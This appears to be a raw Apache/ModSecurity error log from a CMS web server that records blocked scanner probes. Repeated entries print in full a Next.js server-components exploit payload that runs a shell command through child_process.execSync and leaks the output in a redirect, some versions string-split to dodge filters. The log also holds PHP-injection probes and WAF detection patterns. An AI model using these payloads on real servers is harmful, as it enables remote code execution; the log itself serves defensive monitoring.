"OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aYZ1IyJ-w8Lv4xeZdOV6jAAAAEg"] [Sat Feb 07 01:11:33.080661 2026] [:error] [pid 3379:tid 3409] [client 167.172.232.142:57496] [client 167.172.232.142] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.cms-1.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aYZ1Jf1r6IElnz7edglwZQAAABQ"] [Sat Feb 07 01:25:30.956525 2026] [autoindex:error] [pid 3797:tid 3809] [client 195.178.110.192:38682] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 07 01:26:09.665978 2026] [:error] [pid 3381:tid 3429] [client 195.178.110.192:52918] [client 195.178.110.192] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aYZ4kegl4Lz_mAWdB1FZtQAAAIQ"] [Mon Feb 09 01:12:33.399518 2026] [:error] [pid 7699:tid 7749] [client 74.7.241.35:39536] [client 74.7.241.35] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aYkYYRWTbv_JLmvC09mNSgAAAJI"], referer: https://cms-1.dev-unit.com/event/Joy-&-Connection---with-Chude-Jideonwo [Mon Feb 09 01:12:59.737464 2026] [autoindex:error] [pid 7700:tid 7769] [client 74.7.241.35:37894] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://cms-1.dev-unit.com/assets/front/img [Mon Feb 09 02:24:14.664247 2026] [core:error] [pid 7699:tid 7749] [client 74.7.227.11:47044] AH10244: invalid URI path (/assets/front/js/%url%), referer: https://www.cms-1.dev-unit.com/assets/front/js/jquery.magnific-popup.min.js [Tue Feb 10 17:54:49.102690 2026] [:error] [pid 9330:tid 9332] [client 20.43.35.7:20715] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 10 17:54:50.583926 2026] [:error] [pid 9330:tid 9350] [client 20.43.35.7:20715] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Tue Feb 10 17:54:55.892159 2026] [:error] [pid 9330:tid 9355] [client 20.43.35.7:20715] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 10 17:55:17.512915 2026] [:error] [pid 9133:tid 9210] [client 20.43.35.7:2015] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Feb 11 03:00:34.629213 2026] [:error] [pid 17831:tid 17847] [client 45.148.10.159:60364] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aYvUsjzFhtoa3tKUW3Sa-wAAAY0"] [Wed Feb 11 03:04:35.311949 2026] [:error] [pid 17891:tid 17923] [client 45.148.10.159:44734] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aYvVoxvD9JdGBVphupwMLwAAAkA"] [Wed Feb 11 04:28:43.287487 2026] [:error] [pid 18849:tid 18863] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _goav=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zftn=Buffer.from(_goav).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zftn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpWx9ayL7wRi2xttsBNwAAAMw"] [Wed Feb 11 04:28:43.446815 2026] [:error] [pid 18849:tid 18854] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _brcv=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _zptx=Buffer.from(_brcv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zptx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpWx9ayL7wRi2xttsBOQAAAMM"] [Wed Feb 11 04:28:43.585581 2026] [:error] [pid 18849:tid 18858] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ovew=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fbjd=Buffer.from(_ovew).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fbjd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpWx9ayL7wRi2xttsBOwAAAMc"] [Wed Feb 11 04:28:43.711352 2026] [:error] [pid 18849:tid 18861] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xhxx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xnas=Buffer.from(_xhxx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xnas};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpWx9ayL7wRi2xttsBPQAAAMo"] [Wed Feb 11 04:28:43.823062 2026] [:error] [pid 18849:tid 18866] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oawb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bpki=Buffer.from(_oawb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bpki};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpWx9ayL7wRi2xttsBPgAAAM8"] [Wed Feb 11 04:28:43.928470 2026] [:error] [pid 18849:tid 18871] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qbkz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bvgj=Buffer.from(_qbkz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bvgj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpWx9ayL7wRi2xttsBPwAAANQ"] [Wed Feb 11 04:28:44.028183 2026] [:error] [pid 18849:tid 18874] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ivff=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _pbsw=Buffer.from(_ivff).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pbsw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpWx9ayL7wRi2xttsBQAAAANc"] [Wed Feb 11 04:28:44.123907 2026] [:error] [pid 18849:tid 18862] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tiki=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _czja=Buffer.from(_tiki).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_czja};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXB9ayL7wRi2xttsBQQAAAMs"] [Wed Feb 11 04:28:44.220395 2026] [:error] [pid 18849:tid 18860] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gsyy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dbaj=Buffer.from(_gsyy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dbaj};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aYvpXB9ayL7wRi2xttsBQwAAAMk"] [Wed Feb 11 04:28:44.310431 2026] [:error] [pid 18849:tid 18852] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vhsg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _embn=Buffer.from(_vhsg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_embn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aYvpXB9ayL7wRi2xttsBRAAAAME"] [Wed Feb 11 04:28:44.395837 2026] [:error] [pid 18849:tid 18869] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hsyb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _cgzu=Buffer.from(_hsyb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cgzu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aYvpXB9ayL7wRi2xttsBRQAAANI"] [Wed Feb 11 04:28:44.479840 2026] [:error] [pid 18849:tid 18872] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _deld=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ieaf=Buffer.from(_deld).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ieaf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aYvpXB9ayL7wRi2xttsBRgAAANU"] [Wed Feb 11 04:28:44.562136 2026] [:error] [pid 18849:tid 18859] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _umcx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kouu=Buffer.from(_umcx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kouu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aYvpXB9ayL7wRi2xttsBRwAAAMg"] [Wed Feb 11 04:28:44.642131 2026] [:error] [pid 18849:tid 18857] [client 195.178.110.195:58824] [client 195.178.110.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zedc=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _dkck=Buffer.from(_zedc).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dkck};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id 